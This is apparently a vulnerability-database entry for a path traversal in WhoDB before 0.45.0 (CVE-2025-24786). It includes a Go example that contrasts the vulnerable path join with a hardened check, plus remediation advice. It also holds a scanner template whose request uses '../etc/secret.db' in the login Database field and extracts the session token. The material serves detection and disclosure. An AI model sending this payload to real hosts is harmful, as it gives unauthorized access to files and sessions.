
WhoDB < 0.45.0 - Path Traversal

CVE-2025-24786
Verified

Description

WhoDB before 0.45.0 does not validate the file name it is given when opening a Sqlite3 database. An unauthenticated attacker who controls the Database field of the login request can therefore use path traversal sequences (for example ../) to open arbitrary Sqlite3 database files on the host.
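The weak pattern behind CWE-22 here, beside one way to harden it, as an added Go example (WhoDB's backend is written in Go, but this is not WhoDB's own code or its actual fix). The SQLite root directory /db is an assumption chosen so that the template's payload "../etc/secret.db" resolves to /etc/secret.db; the request body is a constructed copy of the variables object from the template below, and the loginRequest type models only the fields the check needs.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// sqliteRoot is the directory the application is meant to serve SQLite
// files from. This is an assumption for the example, chosen so that the
// template's payload "../etc/secret.db" resolves to /etc/secret.db.
const sqliteRoot = "/db"

// ErrOutsideRoot is returned when a Database value escapes sqliteRoot.
var ErrOutsideRoot = errors.New("database path escapes the SQLite root")

// vulnerableSQLitePath shows the CWE-22 pattern: the user-controlled
// Database field is joined onto the root with no containment check.
// filepath.Join cleans ".." components but does not stop them escaping.
func vulnerableSQLitePath(database string) string {
	return filepath.Join(sqliteRoot, database)
}

// safeSQLitePath resolves the Database field the same way, then verifies
// that the cleaned result still lies inside sqliteRoot and is not the root
// directory itself.
func safeSQLitePath(database string) (string, error) {
	if database == "" || filepath.IsAbs(database) {
		return "", ErrOutsideRoot
	}
	full := filepath.Join(sqliteRoot, database)
	rel, err := filepath.Rel(sqliteRoot, full)
	if err != nil {
		return "", ErrOutsideRoot
	}
	// After cleaning, an escape shows up as a leading ".." component;
	// "." means the value resolved to the root directory, not a file.
	sep := string(filepath.Separator)
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+sep) {
		return "", ErrOutsideRoot
	}
	return full, nil
}

// loginRequest models the shape of the GraphQL Login variables used by the
// template's request; only the fields needed for the check are included.
type loginRequest struct {
	Variables struct {
		Credentials struct {
			Type     string `json:"Type"`
			Database string `json:"Database"`
		} `json:"credentials"`
	} `json:"variables"`
}

// checkLoginBody parses a Login request body and returns the vetted on-disk
// path for Sqlite3 logins, or an error if the Database value is rejected.
// For other database types the Database value is a name, not a path, and is
// returned unchanged.
func checkLoginBody(body []byte) (string, error) {
	var req loginRequest
	if err := json.Unmarshal(body, &req); err != nil {
		return "", fmt.Errorf("malformed login body: %w", err)
	}
	creds := req.Variables.Credentials
	if creds.Type != "Sqlite3" {
		return creds.Database, nil
	}
	return safeSQLitePath(creds.Database)
}

// traversalPayload is a constructed copy of the variables object sent by
// the template's request, embedded so the example runs offline.
const traversalPayload = `{"operationName":"Login","variables":{"credentials":{"Type":"Sqlite3","Hostname":"","Database":"../etc/secret.db","Username":"","Password":"","Advanced":[]}}}`

func main() {
	fmt.Println("vulnerable code opens:", vulnerableSQLitePath("../etc/secret.db"))
	if _, err := checkLoginBody([]byte(traversalPayload)); err != nil {
		fmt.Println("hardened check rejected the payload:", err)
	}
	p, _ := checkLoginBody([]byte(`{"variables":{"credentials":{"Type":"Sqlite3","Database":"app.db"}}}`))
	fmt.Println("hardened check accepted:", p)
}
```

The check is purely lexical: it stops "../" and absolute paths, but it does not follow symbolic links, so a symlink placed inside the root would still be followed by the open call. Where that matters, resolve with filepath.EvalSymlinks before the containment check, or on Go 1.24 and later open files through os.OpenRoot, which confines every open to the given directory at the OS level.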

Severity

High

CVSS Score

7.5

Exploit Probability

52%

Affected Product

whodb

Published Date

February 1, 2026

Template Author

basicbeny

CVE-2025-24786.yaml
id: CVE-2025-24786

info:
  name: WhoDB < 0.45.0 - Path Traversal
  author: basicbeny
  severity: high
  description: |
    WhoDB contains a path traversal caused by lack of validation when opening database files, letting unauthenticated attackers access arbitrary Sqlite3 databases on the host system, exploit requires attacker to manipulate database filename input.
  impact: |
    Attackers can access any Sqlite3 database on the system, potentially exposing sensitive data.
  remediation: |
    Upgrade to version 0.45.0 or later.
  reference:
    - https://github.com/clidey/whodb
    - https://github.com/clidey/whodb/security/advisories/GHSA-9r4c-jwx3-3j76
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-24786
    epss-score: 0.51816
    epss-percentile: 0.97942
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: clidey
    product: whodb
    fofa-query: body="whodb"
  tags: cve,cve2025,whodb,lfi,pathtraversal,unauth

http:
  - raw:
      - |
        POST /api/query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"operationName":"Login","variables":{"credentials":{"Type":"Sqlite3","Hostname":"","Database":"../etc/secret.db","Username":"","Password":"","Advanced":[]}},"query":"mutation Login($credentials: LoginCredentials!) {\n  Login(credentials: $credentials) {\n    Status\n    __typename\n  }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Status":true'
          - '"StatusResponse"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        name: token
        group: 1
        regex:
          - 'Token=([^;]+)'
# digest: 490a0046304402207962359d7fcb998a6c704df622280af29f8ce45ed732a0b2091bca565480c36e0220208ed431ca7f7cbb48c9b4bc4005aac88e783b66a52eae73ae5a28b7b670fa23:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2025-24786
CWE ID:
CWE-22

References

https://github.com/clidey/whodb
https://github.com/clidey/whodb/security/advisories/GHSA-9r4c-jwx3-3j76
https://nvd.nist.gov/vuln/detail/CVE-2025-24786

Remediation Steps

Upgrade to version 0.45.0 or later.